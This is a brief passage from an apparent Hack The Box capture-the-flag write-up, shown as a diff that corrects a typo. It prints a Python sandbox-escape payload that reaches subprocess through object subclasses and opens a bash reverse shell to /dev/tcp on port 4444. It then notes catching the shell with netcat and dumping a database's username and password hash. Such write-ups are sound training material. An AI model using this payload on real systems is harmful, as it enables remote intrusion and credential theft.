Raihan93-coder/HTB-writeups/code/WriteUp.md

   ```bash
   raise Exception(str((()) .__class__.__bases__[0].__subclasses__()[317]("bash -c 'bash -i >& /dev/tcp/your_IP/4444 0>&1'", shell=True, stdout=-1).communicate()))
   ```
-- USed netcat to connect to my ip address and got a docker bin
+- Used netcat to connect to my ip address and got a docker bin
 - Manually searched the directories manually and found database.db
 - Dumped the database.db and got the username and password hash